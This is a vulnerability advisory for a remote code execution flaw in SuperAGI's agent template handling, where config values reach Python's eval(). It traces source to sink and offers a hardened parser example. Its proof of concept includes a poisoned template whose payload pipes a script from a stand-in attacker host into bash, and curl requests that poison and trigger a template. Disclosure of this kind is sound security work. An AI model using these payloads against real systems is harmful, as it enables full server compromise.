CVSS 6.5 (medium), CVE-2025-51472

CVE-2025-51472: SuperAGI RCE via Unsafe Eval in Template Config

Remote code execution vulnerability in SuperAGI through unsafe eval() usage in agent template configuration processing.

Gecko Security Research
Gecko Security Team
1/15/2025

Description

An RCE was found in SuperAGI in the AgentTemplate.eval_agent_config method. The vulnerability is caused by the direct use of Python's eval() function on user-controlled input without any sanitization or validation. When an agent template is cloned from the marketplace or updated via the API, configuration values for keys such as 'goal', 'constraints', and 'instruction' are passed directly to eval(). The code in agent_template.py explicitly evaluates these values:

elif key == "goal" or key == "constraints" or key == "instruction":
    return eval(value)

Since these values can be controlled by an attacker, arbitrary Python code execution is possible, leading to complete system compromise.

Source - Sink Analysis

Source:

  • Function: AgentTemplate.fetch_marketplace_detail
  • File Path: superagi/models/agent_template.py
  • Description: Initial HTTP request that receives untrusted data from marketplace API.
  • Code: response = requests.get(marketplace_url + "agent_templates/marketplace/template_details/" + str(agent_template_id),

Intermediate:

  • Function: AgentTemplate.clone_agent_template_from_marketplace
  • File Path: superagi/models/agent_template.py
  • Description: Processes marketplace response and stores config values.
  • Code: agent_configurations.append(AgentTemplateConfig(agent_template_id=template.id, key=key, value=str(value["value"])))

Sink:

  • Function: AgentTemplate.eval_agent_config
  • File Path: superagi/models/agent_template.py
  • Description: Dangerous eval() call on user-controlled input.
  • Code: return eval(value)
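
A hardened form of the sink, as an added example (not SuperAGI's code or its actual patch): the clone step stores str(value["value"]), so these values are Python literal text, and ast.literal_eval plus a type check can parse them without executing anything. The names parse_list_config and audit_rows, the size limits and the sample rows are assumptions constructed for illustration.

```python
import ast

LIST_KEYS = {"goal", "constraints", "instruction"}  # keys the advisory names
MAX_RAW, MAX_ITEMS = 20_000, 50  # assumed limits, not taken from SuperAGI


def parse_list_config(key, value):
    """Hypothetical replacement for the eval(value) branch: data only, never code."""
    if key not in LIST_KEYS:
        raise KeyError(f"not a list-valued config key: {key}")
    if len(value) > MAX_RAW:
        raise ValueError(f"{key}: value too long")
    try:
        # literal_eval accepts only Python literals (str, list, numbers, ...);
        # names, calls and attribute access raise instead of executing.
        parsed = ast.literal_eval(value)
    except (ValueError, TypeError, SyntaxError, MemoryError, RecursionError) as exc:
        raise ValueError(f"{key}: not a plain literal") from exc
    if not isinstance(parsed, list) or len(parsed) > MAX_ITEMS:
        raise ValueError(f"{key}: expected a list of at most {MAX_ITEMS} items")
    if not all(isinstance(item, str) for item in parsed):
        raise ValueError(f"{key}: every item must be a string")
    return parsed


def audit_rows(rows):
    """Return stored (key, value) pairs that do not parse as a list of strings."""
    flagged = []
    for key, value in rows:
        if key in LIST_KEYS:
            try:
                parse_list_config(key, value)
            except ValueError:
                flagged.append((key, value))
    return flagged


# Constructed sample rows, shaped like str(value["value"]) from the clone step.
SAMPLE_ROWS = [
    ("goal", str(["Summarise the weekly report"])),
    ("constraints", "[]"),
    ("instruction", "['step one', 'step two']"),
    ("goal", "__import__('os').getpid()"),  # non-literal expression: rejected
    ("goal", "'a bare string, not a list'"),
]

if __name__ == "__main__":
    for key, value in audit_rows(SAMPLE_ROWS):
        print("rejected:", key, repr(value))
```

audit_rows can also be run over config rows that were stored before the parser was tightened, to find values that would have been executed by the original sink.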

PoC

  1. Create a malicious marketplace template JSON:

    {
      "name": "Evil Template",
      "description": "RCE",
      "agent_workflow_name": "Goal Based Agent",
      "configs": {
        "goal": "__import__('os').system('curl attacker.com/shell | bash')",
        "instruction": [],
        "constraints": []
      }
    }
    
  2. Host this JSON at a marketplace endpoint that the target SuperAGI instance trusts.

  3. When a victim clones this template, the eval() call in eval_agent_config will execute the malicious Python code in the 'goal' config.

You can also exploit the same path via the template update API after creating a template:

curl -X PUT "http://localhost:3000/api/agent_templates/update_agent_template/1" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Exploited Template",
    "description": "RCE Test",
    "agent_configs": {
        "agent_workflow": "Goal Based Workflow",
        "goal": "__import__(\"os\").system(\"touch /tmp/pwned\")",
        "instruction": ["Test instruction"],
        "constraints": ["Test constraint"],
        "tools": ["Read File", "Write File"],
        "exit": "No exit criterion",
        "iteration_interval": 500,
        "model": "gpt-3.5-turbo",
        "max_iterations": 25,
        "permission_type": "God Mode",
        "LTM_DB": "Pinecone"
    }
}'

Once the template is poisoned, accessing it triggers the execution: curl "http://localhost:3000/api/agent_templates/agent_config?agent_template_id=1".

Impact

This vulnerability allows for complete system compromise by an attacker who can manipulate template data through either the marketplace or direct API access. The attacker can execute arbitrary code with the permissions of the service running SuperAGI, potentially leading to data theft, lateral movement within the network, persistent system access or infrastructure compromise.